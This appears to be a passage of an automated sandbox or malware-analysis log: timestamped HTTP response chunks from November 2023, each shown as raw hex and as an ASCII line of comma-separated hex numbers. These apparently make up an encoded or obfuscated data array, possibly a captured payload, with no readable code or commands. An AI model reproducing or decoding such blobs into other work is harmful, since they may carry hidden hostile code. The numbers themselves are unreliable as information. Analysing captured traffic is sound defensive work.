                                                    2023-11-04 00:30:16 UTC908INData Raw: 65 61 2c 31 33 33 2c 31 34 33 2c 31 30 36 2c 64 33 2c 39 62 2c 65 35 2c 31 34 35 2c 31 32 39 2c 31 31 64 2c 64 66 2c 64 35 2c 64 35 2c 31 33 36 2c 31 36 38 2c 34 62 2c 31 31 30 2c 37 32 2c 31 30 64 2c 31 33 63 2c 31 35 34 2c 35 65 2c 31 34 31 2c 39 38 2c 31 31 32 2c 31 32 33 2c 31 32 61 2c 31 34 63 2c 31 31 66 2c 61 61 2c 63 65 2c 31 33 39 2c 31 35 64 2c 61 38 2c 31 32 61 2c 63 36 2c 66 31 2c 31 33 39 2c 31 35 38 2c 65 32 2c 31 31 34 2c 65 33 2c 66 38 2c 31 34 35 2c 31 35 65 2c 64 35 2c 31 34 62 2c 39 65 2c 64 31 2c 31 31 31 2c 31 33 32 2c 31 30 36 2c 31 31 35 2c 66 34 2c 65 39 2c 31 34 33 2c 31 33 37 2c 31 33 37 2c 31 31 30 2c 63 62 2c 65 30 2c 31 32 61 2c 31 32 32 2c 36 34 2c 31 32 64 2c 35 37 2c 66 31 2c 31 35 36 2c 31 34 35 2c 31 32 37 2c 31 32 35 2c
                                                    Data Ascii: ea,133,143,106,d3,9b,e5,145,129,11d,df,d5,d5,136,168,4b,110,72,10d,13c,154,5e,141,98,112,123,12a,14c,11f,aa,ce,139,15d,a8,12a,c6,f1,139,158,e2,114,e3,f8,145,15e,d5,14b,9e,d1,111,132,106,115,f4,e9,143,137,137,110,cb,e0,12a,122,64,12d,57,f1,156,145,127,125,
                                                    2023-11-04 00:30:16 UTC924INData Raw: 35 34 2c 31 33 34 2c 62 38 2c 31 32 31 2c 37 39 2c 31 35 35 2c 31 33 63 2c 31 34 33 2c 31 34 63 2c 31 34 35 2c 63 31 2c 31 33 36 2c 31 35 33 2c 31 32 39 2c 31 32 38 2c 31 36 35 2c 63 31 2c 31 35 64 2c 37 31 2c 31 36 30 2c 31 33 33 2c 31 32 35 2c 31 31 33 2c 31 33 32 2c 62 65 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 33 63 2c 31 33 37 2c 39 39 2c 31 32 39 2c 38 38 2c 31 32 63 2c 31 33 66 2c 31 32 32 2c 31 32 66 2c 31 35 64 2c 31 33 32 2c 31 33 32 2c 31 35 63 2c 31 34 35 2c 31 33 65 2c 31 35 38 2c 62 63 2c 31 32 38 2c 34 63 2c 31 35 64 2c 31 34 61 2c 31 35 65 2c 31 32 63 2c 31 36 38 2c 31 31 34 2c 31 30 65 2c 31 32 33 2c 31 33 32 2c 31 33 35 2c 31 35 34 2c 61 62 2c 31 35 35 2c 31 35 37 2c 31 32 66 2c 31 32 30 2c 31 32 39 2c 31 35 31 2c 31 33 34 2c 35 62 2c
                                                    Data Ascii: 54,134,b8,121,79,155,13c,143,14c,145,c1,136,153,129,128,165,c1,15d,71,160,133,125,113,132,be,154,146,156,13c,137,99,129,88,12c,13f,122,12f,15d,132,132,15c,145,13e,158,bc,128,4c,15d,14a,15e,12c,168,114,10e,123,132,135,154,ab,155,157,12f,120,129,151,134,5b,
                                                    2023-11-04 00:30:16 UTC940INData Raw: 35 38 2c 64 33 2c 66 38 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 62 39 2c 31 36 38 2c 65 37 2c 36 32 2c 31 31 39 2c 31 33 32 2c 31 33 32 2c 31 35 34 2c 31 33 61 2c 63 32 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 64 65 2c 31 33 34 2c 65 63 2c 36 66 2c 63 33 2c 31 35 64 2c 31 32 64 2c 31 34 33 2c 61 32 2c 31 31 34 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 62 32 2c 31 34 64 2c 31 31 32 2c 66 33 2c 31 33 32 2c 31 36 38 2c 31 32 33 2c 31 32 35 2c 61 33 2c 39 65 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 63 36 2c 31 31 66 2c 66 30 2c 62 66 2c 31 35 37 2c 31 33 34 2c 31 32 66 2c 31 32 32 2c 64 33 2c 63 38 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 63 38 2c 31 35 38 2c 31 33 32 2c 37 65 2c 39 38 2c 31 36 35 2c 31 33 61
                                                    Data Ascii: 58,d3,f8,135,165,14b,15e,b9,168,e7,62,119,132,132,154,13a,c2,149,137,129,12a,de,134,ec,6f,c3,15d,12d,143,a2,114,14b,158,153,129,b2,14d,112,f3,132,168,123,125,a3,9e,142,154,146,156,c6,11f,f0,bf,157,134,12f,122,d3,c8,13d,143,15c,145,c8,158,132,7e,98,165,13a
                                                    2023-11-04 00:30:16 UTC956INData Raw: 2c 31 33 36 2c 37 32 2c 65 62 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 62 39 2c 31 35 64 2c 37 64 2c 62 64 2c 31 30 62 2c 31 34 34 2c 31 33 38 2c 31 35 37 2c 36 62 2c 31 31 65 2c 31 33 34 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 62 62 2c 31 36 38 2c 35 39 2c 64 32 2c 38 30 2c 31 32 63 2c 31 32 66 2c 31 35 33 2c 65 65 2c 31 34 61 2c 31 34 38 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 65 30 2c 31 33 34 2c 36 39 2c 63 66 2c 39 37 2c 31 35 37 2c 31 32 39 2c 31 34 32 2c 39 62 2c 31 30 36 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 61 34 2c 31 36 35 2c 65 35 2c 31 33 37 2c 38 65 2c 31 36 32 2c 31 31 65 2c 31 32 34 2c 61 62 2c 31 32 35 2c 31 34 31 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 62 33 2c 31 33 37 2c 34 33 2c 65 35 2c 61 65 2c 31 32 65 2c 31 32
                                                    Data Ascii: ,136,72,eb,161,134,140,122,b9,15d,7d,bd,10b,144,138,157,6b,11e,134,165,14b,15e,bb,168,59,d2,80,12c,12f,153,ee,14a,148,137,129,12a,e0,134,69,cf,97,157,129,142,9b,106,14b,158,153,129,a4,165,e5,137,8e,162,11e,124,ab,125,141,154,146,156,b3,137,43,e5,ae,12e,12
                                                    2023-11-04 00:30:16 UTC972INData Raw: 38 64 2c 31 33 32 2c 65 35 2c 31 32 32 2c 37 36 2c 31 34 38 2c 63 39 2c 31 33 34 2c 31 33 34 2c 64 62 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 61 39 2c 31 35 64 2c 64 37 2c 65 65 2c 37 66 2c 31 33 37 2c 63 38 2c 31 35 35 2c 31 35 32 2c 64 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 61 36 2c 31 36 38 2c 34 36 2c 39 38 2c 33 62 2c 31 32 34 2c 62 64 2c 31 35 31 2c 31 33 63 2c 31 30 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 63 62 2c 31 33 34 2c 62 33 2c 66 33 2c 34 65 2c 31 34 66 2c 62 37 2c 31 34 30 2c 31 34 39 2c 66 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 39 66 2c 31 36 35 2c 31 30 39 2c 65 36 2c 31 33 66 2c 31 35 61 2c 61 63 2c 31 32 32 2c 31 30 38 2c 65 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 62
                                                    Data Ascii: 8d,132,e5,122,76,148,c9,134,134,db,161,134,140,122,a9,15d,d7,ee,7f,137,c8,155,152,d9,135,165,14b,15e,a6,168,46,98,3b,124,bd,151,13c,106,149,137,129,12a,cb,134,b3,f3,4e,14f,b7,140,149,f5,14b,158,153,129,9f,165,109,e6,13f,15a,ac,122,108,e2,142,154,146,156,b
                                                    2023-11-04 00:30:16 UTC988INData Raw: 63 34 2c 64 65 2c 31 33 31 2c 63 39 2c 31 35 33 2c 39 62 2c 65 37 2c 31 33 34 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 61 36 2c 31 36 38 2c 31 32 62 2c 61 36 2c 36 30 2c 31 31 65 2c 62 66 2c 31 34 66 2c 31 34 36 2c 31 31 33 2c 31 34 38 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 63 62 2c 31 33 34 2c 31 33 37 2c 61 33 2c 36 38 2c 31 34 39 2c 62 38 2c 31 33 65 2c 31 30 63 2c 31 30 32 2c 31 34 61 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 39 66 2c 31 36 35 2c 31 32 38 2c 31 30 65 2c 34 63 2c 31 35 34 2c 61 64 2c 31 32 30 2c 61 33 2c 65 66 2c 31 34 31 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 62 33 2c 31 33 37 2c 31 32 35 2c 61 61 2c 37 31 2c 31 32 30 2c 62 38 2c 31 31 64 2c 36 62 2c 31 31 61 2c 31 33 63 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 62 35 2c 31 35 38 2c 31 34 66
                                                    Data Ascii: c4,de,131,c9,153,9b,e7,134,165,14b,15e,a6,168,12b,a6,60,11e,bf,14f,146,113,148,137,129,12a,cb,134,137,a3,68,149,b8,13e,10c,102,14a,158,153,129,9f,165,128,10e,4c,154,ad,120,a3,ef,141,154,146,156,b3,137,125,aa,71,120,b8,11d,6b,11a,13c,143,15c,145,b5,158,14f
                                                    2023-11-04 00:30:16 UTC1004INData Raw: 34 33 2c 36 61 2c 31 33 63 2c 61 30 2c 64 63 2c 31 34 61 2c 31 35 38 2c 31 34 62 2c 31 32 39 2c 39 66 2c 31 36 35 2c 66 64 2c 31 30 65 2c 35 38 2c 31 34 65 2c 36 30 2c 31 31 65 2c 31 31 37 2c 63 38 2c 31 34 31 2c 31 35 34 2c 31 33 65 2c 31 35 36 2c 62 33 2c 31 33 37 2c 35 39 2c 66 37 2c 37 35 2c 31 31 61 2c 36 62 2c 31 31 62 2c 65 33 2c 66 33 2c 31 33 63 2c 31 34 33 2c 31 35 34 2c 31 34 35 2c 62 35 2c 31 35 38 2c 31 34 38 2c 31 30 61 2c 31 34 33 2c 31 34 62 2c 37 35 2c 31 35 37 2c 39 30 2c 66 65 2c 31 33 33 2c 31 32 35 2c 31 31 62 2c 31 33 32 2c 61 63 2c 31 35 34 2c 31 30 32 2c 31 33 65 2c 31 35 31 2c 31 31 64 2c 35 32 2c 31 32 33 2c 31 36 35 2c 63 61 2c 31 33 66 2c 31 32 32 2c 31 33 37 2c 31 35 64 2c 61 37 2c 31 34 33 2c 31 32 65 2c 31 32 38 2c 31 34 64
                                                    Data Ascii: 43,6a,13c,a0,dc,14a,158,14b,129,9f,165,fd,10e,58,14e,60,11e,117,c8,141,154,13e,156,b3,137,59,f7,75,11a,6b,11b,e3,f3,13c,143,154,145,b5,158,148,10a,143,14b,75,157,90,fe,133,125,11b,132,ac,154,102,13e,151,11d,52,123,165,ca,13f,122,137,15d,a7,143,12e,128,14d
                                                    2023-11-04 00:30:16 UTC1020INData Raw: 2c 31 33 38 2c 63 39 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 61 37 2c 31 34 33 2c 39 32 2c 62 36 2c 66 62 2c 31 33 32 2c 31 32 62 2c 31 31 65 2c 31 30 30 2c 66 61 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 39 65 2c 31 32 35 2c 35 39 2c 61 33 2c 65 33 2c 31 32 65 2c 31 31 61 2c 31 34 62 2c 62 35 2c 61 30 2c 31 32 38 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 61 61 2c 31 32 32 2c 36 64 2c 66 61 2c 63 66 2c 31 31 64 2c 31 32 63 2c 31 33 61 2c 31 35 37 2c 63 31 2c 31 35 32 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 62 35 2c 31 35 65 2c 36 61 2c 31 30 35 2c 62 32 2c 66 66 2c 65 65 2c 31 32 37 2c 31 30 31 2c 65 39 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 39 33 2c 31 32 61 2c 38 66 2c 64 31 2c 61 64 2c 66 63 2c 31 30 38 2c 31 35 32 2c 66 30
                                                    Data Ascii: ,138,c9,140,122,13f,15d,a7,143,92,b6,fb,132,12b,11e,100,fa,14b,15e,13c,168,9e,125,59,a3,e3,12e,11a,14b,b5,a0,128,12a,161,134,aa,122,6d,fa,cf,11d,12c,13a,157,c1,152,129,135,165,b5,15e,6a,105,b2,ff,ee,127,101,e9,146,156,149,137,93,12a,8f,d1,ad,fc,108,152,f0
                                                    2023-11-04 00:30:16 UTC1036INData Raw: 2c 31 35 34 2c 63 33 2c 31 35 36 2c 65 64 2c 31 32 39 2c 65 32 2c 66 61 2c 38 34 2c 31 32 37 2c 38 36 2c 66 31 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 64 36 2c 31 32 64 2c 31 31 32 2c 65 64 2c 31 34 39 2c 31 32 39 2c 35 38 2c 31 35 38 2c 35 65 2c 65 36 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 61 30 2c 31 33 32 2c 62 66 2c 31 34 35 2c 66 30 2c 31 32 36 2c 36 63 2c 31 32 61 2c 36 66 2c 66 39 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 62 39 2c 31 34 35 2c 31 30 34 2c 64 38 2c 31 35 32 2c 31 34 35 2c 36 65 2c 31 34 62 2c 31 35 33 2c 62 30 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 62 39 2c 31 36 38 2c 62 31 2c 31 31 36 2c 63 64 2c 31 30 32 2c 36 35 2c 31 34 37 2c 38 63 2c 31 32 35 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31
                                                    Data Ascii: ,154,c3,156,ed,129,e2,fa,84,127,86,f1,13f,15d,13d,143,d6,12d,112,ed,149,129,58,158,5e,e6,13c,168,134,125,a0,132,bf,145,f0,126,6c,12a,6f,f9,161,134,140,122,b9,145,104,d8,152,145,6e,14b,153,b0,135,165,14b,15e,b9,168,b1,116,cd,102,65,147,8c,125,149,137,129,1
                                                    2023-11-04 00:30:16 UTC1052INData Raw: 35 36 2c 31 34 39 2c 31 33 37 2c 61 33 2c 31 32 32 2c 31 35 36 2c 31 31 65 2c 31 30 33 2c 31 32 30 2c 66 62 2c 31 34 65 2c 66 36 2c 63 32 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 63 64 2c 31 32 31 2c 31 31 64 2c 31 34 66 2c 31 30 61 2c 31 35 63 2c 66 38 2c 31 35 39 2c 65 34 2c 61 34 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 63 30 2c 31 34 65 2c 36 35 2c 31 31 65 2c 31 31 39 2c 31 32 39 2c 31 31 63 2c 31 32 35 2c 65 38 2c 61 31 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 64 36 2c 31 33 64 2c 35 61 2c 31 33 66 2c 66 33 2c 31 32 38 2c 66 30 2c 31 35 36 2c 65 61 2c 64 64 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 39 64 2c 31 32 61 2c 31 34 30 2c 31 33 39 2c 31 30 39 2c 31 35 34 2c 31 30 33 2c 31 32 38 2c 63 30 2c 61 39 2c 31
                                                    Data Ascii: 56,149,137,a3,122,156,11e,103,120,fb,14e,f6,c2,15c,145,14b,158,cd,121,11d,14f,10a,15c,f8,159,e4,a4,123,132,142,154,c0,14e,65,11e,119,129,11c,125,e8,a1,13f,15d,13d,143,d6,13d,5a,13f,f3,128,f0,156,ea,dd,13c,168,134,125,9d,12a,140,139,109,154,103,128,c0,a9,1
                                                    2023-11-04 00:30:16 UTC1068INData Raw: 39 2c 31 35 38 2c 31 33 64 2c 62 37 2c 31 33 35 2c 31 36 35 2c 31 34 38 2c 31 35 65 2c 31 30 32 2c 65 36 2c 31 33 34 2c 31 32 35 2c 31 32 32 2c 31 33 32 2c 35 32 2c 64 61 2c 31 34 36 2c 31 35 36 2c 31 34 37 2c 31 33 37 2c 61 38 2c 66 63 2c 31 36 31 2c 31 33 34 2c 31 33 66 2c 31 32 32 2c 62 62 2c 65 62 2c 31 33 64 2c 31 34 33 2c 31 35 62 2c 31 34 35 2c 63 37 2c 65 36 2c 31 35 33 2c 31 32 39 2c 31 33 33 2c 31 36 35 2c 63 31 2c 31 31 30 2c 31 33 63 2c 31 36 38 2c 31 33 31 2c 31 32 35 2c 33 33 2c 62 38 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 63 35 2c 63 35 2c 31 32 39 2c 31 32 61 2c 31 35 66 2c 31 33 34 2c 31 30 36 2c 61 30 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 31 34 36 2c 31 30 30 2c 31 34 62 2c 31 35 38 2c 31 35 32 2c 31 32 39 2c 31
                                                    Data Ascii: 9,158,13d,b7,135,165,148,15e,102,e6,134,125,122,132,52,da,146,156,147,137,a8,fc,161,134,13f,122,bb,eb,13d,143,15b,145,c7,e6,153,129,133,165,c1,110,13c,168,131,125,33,b8,142,154,145,156,c5,c5,129,12a,15f,134,106,a0,13f,15d,13c,143,146,100,14b,158,152,129,1
                                                    2023-11-04 00:30:16 UTC1084INData Raw: 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 65 38 2c 31 30 38 2c 31 32 39 2c 31 32 61 2c 31 35 66 2c 31 33 34 2c 31 32 61 2c 64 64 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 66 62 2c 31 31 36 2c 31 34 62 2c 31 35 38 2c 31 35 31 2c 31 32 39 2c 31 31 66 2c 31 32 30 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 37 66 2c 62 33 2c 31 32 33 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 61 35 2c 31 32 38 2c 31 34 39 2c 31 33 37 2c 31 32 38 2c 31 32 61 2c 63 30 2c 31 30 36 2c 31 34 30 2c 31 32 32 2c 31 33 65 2c 31 35 64 2c 39 63 2c 31 31 35 2c 31 35 63 2c 31 34 35 2c 31 34 61 2c 31 35 38 2c 62 32 2c 66 62 2c 31 33 35 2c 31 36 35 2c 31 34 61 2c 31 35 65 2c 39 62 2c 31 33 61 2c 31 33 34 2c 31 32 35 2c 31 32 32 2c 31 33 32 2c 31 32 63 2c 31 30 66 2c 31
                                                    Data Ascii: ,142,154,145,156,e8,108,129,12a,15f,134,12a,dd,13f,15d,13c,143,fb,116,14b,158,151,129,11f,120,14b,15e,13b,168,7f,b3,123,132,141,154,a5,128,149,137,128,12a,c0,106,140,122,13e,15d,9c,115,15c,145,14a,158,b2,fb,135,165,14a,15e,9b,13a,134,125,122,132,12c,10f,1
                                                    2023-11-04 00:30:16 UTC1100INData Raw: 66 2c 31 32 32 2c 38 61 2c 65 62 2c 31 33 64 2c 31 34 33 2c 31 35 61 2c 31 34 35 2c 63 34 2c 65 37 2c 31 35 33 2c 31 32 39 2c 31 33 34 2c 31 36 35 2c 39 36 2c 65 63 2c 31 33 63 2c 31 36 38 2c 31 33 32 2c 31 32 35 2c 31 30 65 2c 65 65 2c 31 34 32 2c 31 35 34 2c 31 34 33 2c 31 35 36 2c 35 65 2c 66 33 2c 31 32 39 2c 31 32 61 2c 31 36 30 2c 31 33 34 2c 31 32 61 2c 64 64 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 66 62 2c 31 31 36 2c 31 34 62 2c 31 35 38 2c 31 35 32 2c 31 32 39 2c 38 30 2c 66 33 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 37 66 2c 62 33 2c 31 32 33 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 39 31 2c 65 34 2c 31 34 39 2c 31 33 37 2c 31 32 37 2c 31 32 61 2c 64 61 2c 63 33 2c 31 34 30 2c 31 32 32 2c 31 33 65 2c 31 35 64 2c 36 62 2c 31
                                                    Data Ascii: f,122,8a,eb,13d,143,15a,145,c4,e7,153,129,134,165,96,ec,13c,168,132,125,10e,ee,142,154,143,156,5e,f3,129,12a,160,134,12a,dd,13f,15d,13c,143,fb,116,14b,158,152,129,80,f3,14b,15e,13b,168,7f,b3,123,132,141,154,91,e4,149,137,127,12a,da,c3,140,122,13e,15d,6b,1
                                                    2023-11-04 00:30:16 UTC1116INData Raw: 2c 31 34 30 2c 31 32 32 2c 31 33 62 2c 31 35 64 2c 31 33 33 2c 65 38 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 61 2c 31 35 65 2c 38 37 2c 66 36 2c 31 33 34 2c 31 32 35 2c 31 32 31 2c 31 33 32 2c 39 61 2c 63 62 2c 31 34 36 2c 31 35 36 2c 31 34 36 2c 31 33 37 2c 31 32 62 2c 62 34 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 62 2c 31 34 35 2c 39 36 2c 65 36 2c 31 35 33 2c 31 32 39 2c 31 33 33 2c 31 36 35 2c 61 33 2c 64 35 2c 31 33 63 2c 31 36 38 2c 31 33 31 2c 31 32 35 2c 31 32 35 2c 62 63 2c 31 34 32 2c 31 35 34 2c 31 34 32 2c 31 35 36 2c 31 33 66 2c 64 63 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33
                                                    Data Ascii: ,140,122,13b,15d,133,e8,15c,145,14b,158,153,129,135,165,14a,15e,87,f6,134,125,121,132,9a,cb,146,156,146,137,12b,b4,161,134,140,122,13f,15d,13d,143,15b,145,96,e6,153,129,133,165,a3,d5,13c,168,131,125,125,bc,142,154,142,156,13f,dc,129,12a,161,134,140,122,13
                                                    2023-11-04 00:30:16 UTC1132INData Raw: 31 35 62 2c 31 34 35 2c 39 36 2c 65 36 2c 31 35 33 2c 31 32 39 2c 31 33 33 2c 31 36 35 2c 35 66 2c 65 39 2c 31 33 63 2c 31 36 38 2c 31 33 31 2c 31 32 35 2c 31 31 39 2c 64 35 2c 31 34 32 2c 31 35 34 2c 31 34 32 2c 31 35 36 2c 31 35 33 2c 66 61 2c 31 32 39 2c 31 32 61 2c 31 36 30 2c 31 33 34 2c 38 62 2c 62 30 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 61 37 2c 64 33 2c 31 34 62 2c 31 35 38 2c 31 35 31 2c 31 32 39 2c 62 35 2c 31 30 36 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 37 66 2c 62 33 2c 31 32 33 2c 31 33 32 2c 31 34 30 2c 31 35 34 2c 63 36 2c 66 37 2c 31 34 39 2c 31 33 37 2c 31 32 36 2c 31 32 61 2c 31 35 37 2c 64 37 2c 31 34 30 2c 31 32 32 2c 31 33 65 2c 31 35 64 2c 38 38 2c 64 31 2c 31 35 63 2c 31 34 35 2c 31 34 39 2c 31 35 38 2c 36
                                                    Data Ascii: 15b,145,96,e6,153,129,133,165,5f,e9,13c,168,131,125,119,d5,142,154,142,156,153,fa,129,12a,160,134,8b,b0,13f,15d,13c,143,a7,d3,14b,158,151,129,b5,106,14b,15e,13b,168,7f,b3,123,132,140,154,c6,f7,149,137,126,12a,157,d7,140,122,13e,15d,88,d1,15c,145,149,158,6
                                                    2023-11-04 00:30:16 UTC1148INData Raw: 2c 31 33 37 2c 66 34 2c 66 36 2c 31 35 66 2c 31 33 34 2c 31 33 65 2c 31 32 32 2c 64 33 2c 31 33 36 2c 31 33 64 2c 31 34 33 2c 31 35 39 2c 31 34 35 2c 31 33 64 2c 66 38 2c 31 35 30 2c 31 32 39 2c 31 33 31 2c 31 36 35 2c 31 33 61 2c 65 38 2c 31 33 63 2c 31 36 38 2c 31 32 66 2c 31 32 35 2c 35 36 2c 62 64 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 31 35 31 2c 65 62 2c 31 32 39 2c 31 32 61 2c 31 36 30 2c 31 33 34 2c 31 33 66 2c 63 30 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 66 37 2c 66 37 2c 31 34 62 2c 31 35 38 2c 31 35 31 2c 31 32 39 2c 38 30 2c 64 64 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 34 63 2c 39 61 2c 31 32 33 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 62 66 2c 65 66 2c 31 34 39 2c 31 33 37 2c 31 32 38 2c 31 32 61 2c 62 62 2c
                                                    Data Ascii: ,137,f4,f6,15f,134,13e,122,d3,136,13d,143,159,145,13d,f8,150,129,131,165,13a,e8,13c,168,12f,125,56,bd,142,154,145,156,151,eb,129,12a,160,134,13f,c0,13f,15d,13c,143,f7,f7,14b,158,151,129,80,dd,14b,15e,13b,168,4c,9a,123,132,141,154,bf,ef,149,137,128,12a,bb,
                                                    2023-11-04 00:30:16 UTC1164INData Raw: 31 34 66 2c 31 35 36 2c 31 31 61 2c 62 65 2c 34 36 2c 31 36 30 2c 31 34 37 2c 31 35 62 2c 31 30 33 2c 66 64 2c 36 62 2c 64 30 2c 31 31 66 2c 31 32 66 2c 64 33 2c 31 31 31 2c 66 30 2c 31 32 36 2c 62 30 2c 31 33 36 2c 35 63 2c 66 35 2c 31 32 34 2c 31 33 32 2c 31 33 34 2c 31 31 66 2c 31 30 36 2c 66 32 2c 31 33 33 2c 31 34 33 2c 31 35 30 2c 31 34 32 2c 66 32 2c 63 38 2c 31 30 37 2c 66 39 2c 31 32 39 2c 31 36 32 2c 36 31 2c 64 31 2c 31 33 39 2c 31 36 36 2c 31 32 38 2c 31 32 32 2c 61 30 2c 31 32 33 2c 65 63 2c 31 32 34 2c 31 34 32 2c 31 35 35 2c 31 31 30 2c 63 63 2c 33 61 2c 31 32 35 2c 31 34 64 2c 31 33 31 2c 31 30 37 2c 62 37 2c 37 36 2c 31 30 38 2c 31 32 39 2c 31 34 30 2c 65 64 2c 31 30 32 2c 66 35 2c 31 32 38 2c 31 33 37 2c 31 32 36 2c 66 63 2c 66 61 2c 31
                                                    Data Ascii: 14f,156,11a,be,46,160,147,15b,103,fd,6b,d0,11f,12f,d3,111,f0,126,b0,136,5c,f5,124,132,134,11f,106,f2,133,143,150,142,f2,c8,107,f9,129,162,61,d1,139,166,128,122,a0,123,ec,124,142,155,110,cc,3a,125,14d,131,107,b7,76,108,129,140,ed,102,f5,128,137,126,fc,fa,1
                                                    2023-11-04 00:30:16 UTC1180INData Raw: 2c 31 36 34 2c 65 37 2c 66 30 2c 65 36 2c 31 33 30 2c 39 31 2c 31 35 30 2c 62 38 2c 31 30 36 2c 31 33 39 2c 31 33 36 2c 37 38 2c 31 32 36 2c 66 33 2c 66 30 2c 31 34 37 2c 65 61 2c 39 36 2c 31 35 33 2c 31 32 64 2c 66 65 2c 36 64 2c 64 65 2c 63 61 2c 31 35 35 2c 31 31 65 2c 61 32 2c 31 34 31 2c 66 65 2c 39 32 2c 31 35 61 2c 31 32 36 2c 31 34 31 2c 31 32 34 2c 31 32 34 2c 36 61 2c 31 32 65 2c 66 33 2c 31 31 35 2c 31 33 36 2c 31 35 35 2c 39 30 2c 31 33 33 2c 63 32 2c 66 63 2c 31 34 62 2c 63 63 2c 38 37 2c 31 31 65 2c 63 62 2c 31 32 66 2c 31 32 37 2c 64 62 2c 61 33 2c 31 34 31 2c 36 30 2c 65 32 2c 64 66 2c 63 32 2c 39 63 2c 31 36 34 2c 63 66 2c 31 33 39 2c 31 32 63 2c 31 36 37 2c 39 62 2c 31 32 34 2c 36 66 2c 31 30 34 2c 31 33 32 2c 31 35 33 2c 61 64 2c 31 35
                                                    Data Ascii: ,164,e7,f0,e6,130,91,150,b8,106,139,136,78,126,f3,f0,147,ea,96,153,12d,fe,6d,de,ca,155,11e,a2,141,fe,92,15a,126,141,124,124,6a,12e,f3,115,136,155,90,133,c2,fc,14b,cc,87,11e,cb,12f,127,db,a3,141,60,e2,df,c2,9c,164,cf,139,12c,167,9b,124,6f,104,132,153,ad,15
                                                    2023-11-04 00:30:16 UTC1196INData Raw: 37 63 2c 31 34 66 2c 31 33 64 2c 31 34 33 2c 61 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 38 61 2c 31 31 62 2c 31 33 35 2c 31 36 35 2c 31 35 30 2c 31 35 64 2c 36 38 2c 31 32 38 2c 35 34 2c 31 31 37 2c 31 32 33 2c 31 33 32 2c 38 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 36 36 2c 31 32 39 2c 31 32 39 2c 31 32 61 2c 61 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 35 36 2c 31 34 66 2c 31 33 64 2c 31 34 33 2c 31 36 31 2c 31 34 34 2c 36 32 2c 31 31 38 2c 31 35 33 2c 31 31 61 2c 31 33 35 2c 31 36 35 2c 39 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 31 33 31 2c 31 31 36 2c 31 32 33 2c 31 33 32 2c 38 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 31 34 30 2c 31 32 38 2c 31 32 39 2c 31 32 61 2c 31 36 36 2c 31 33 33 2c 31 31 37 2c 65 31 2c 31 31 66 2c 31 34 65 2c 31 33 64 2c
